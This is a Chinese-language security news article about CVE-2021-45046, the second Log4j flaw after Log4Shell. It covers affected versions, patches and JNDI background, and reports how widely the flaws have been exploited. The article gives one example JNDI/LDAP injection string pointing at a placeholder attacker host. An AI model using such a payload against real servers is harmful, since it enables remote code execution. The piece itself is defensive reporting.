最近披露的重大安全漏洞Log4Shell漏洞发布安全补丁修复后,第二个漏洞很快被爆出,第二个漏洞号为CVE-2021-45046,CVSS评分为 3.7 分,并影响从 2.0-beta9 到 2.12.1 和 2.13.0 到 2.15.0 的所有 Log4j 版本。
根据最近的安全研究,对于CVE-2021-44228漏洞补丁的不够完善的修复,导致修复后更有可能被利用,通过恶意输入数据JNDI导致拒绝服务(DoS)攻击,Log4j 的最新版本 2.16.0(适用于需要 Java 8 或更高版本的用户)几乎取消了对消息查找的支持,并默认禁用了 JNDI,这是漏洞的核心组件。建议需要 Java 7 的用户在可用时升级到 Log4j 版本 2.12.2。
安全研究人员称,处理 CVE-2021-44228 表明 JNDI 存在严重的安全问题,虽然我们已经缓解了我们所知道的情况,但默认情况下用户完全禁用它会更安全,特别是因为大多数人不太可能使用它。
根据网络安全行业门户「极牛网」GEEKNB.COM的梳理,JNDI 是 Java Naming and Directory Interface 的缩写,是一种 Java API,它使以编程语言编码的应用程序能够查找数据和资源,例如LDAP服务器。Log4Shell 驻留在 Log4j 库中,Log4j 库是一个开源的、基于 Java 的日志记录框架,通常并入 Apache Web 服务器。
当利用 LDAP 连接器的 JNDI 组件注入恶意 LDAP 请求(例如“${jndi:ldap://attacker_controled_website/payload_to_be_executed}”)时,此时登录运行易受攻击版本的 Web 服务器,就会调用存在漏洞的库,使黑客能够从远程检索有效负载并在本地执行。
与其他涉及某些部分软件的主要网络攻击不同,Log4j 基本上嵌入在每个基于 Java 的产品或 Web 服务中,手动修复它非常困难,由于修补的复杂性和易于利用的漏洞,除非公司和服务立即采取行动,通过实施保护措施来防止对其产品的攻击,否则这个漏洞可能将在未来几年内一直存在。
在漏洞披露后的几天里,至少有10 个不同的黑客团伙加入了漏洞利用潮,全球大约 44% 的企业网络已经受到攻击。远程代码执行漏洞的大规模武器化促使美国网络安全和基础设施安全局 (CISA) 将 Log4Shell 添加到其已知被利用漏洞目录中。
极牛网精选文章《Apache Log4j2漏洞第二弹,Log4Shell漏洞持续影响全球网络》文中所述为作者独立观点,不代表极牛网立场。如若转载请注明出处:https://geeknb.com/17471.html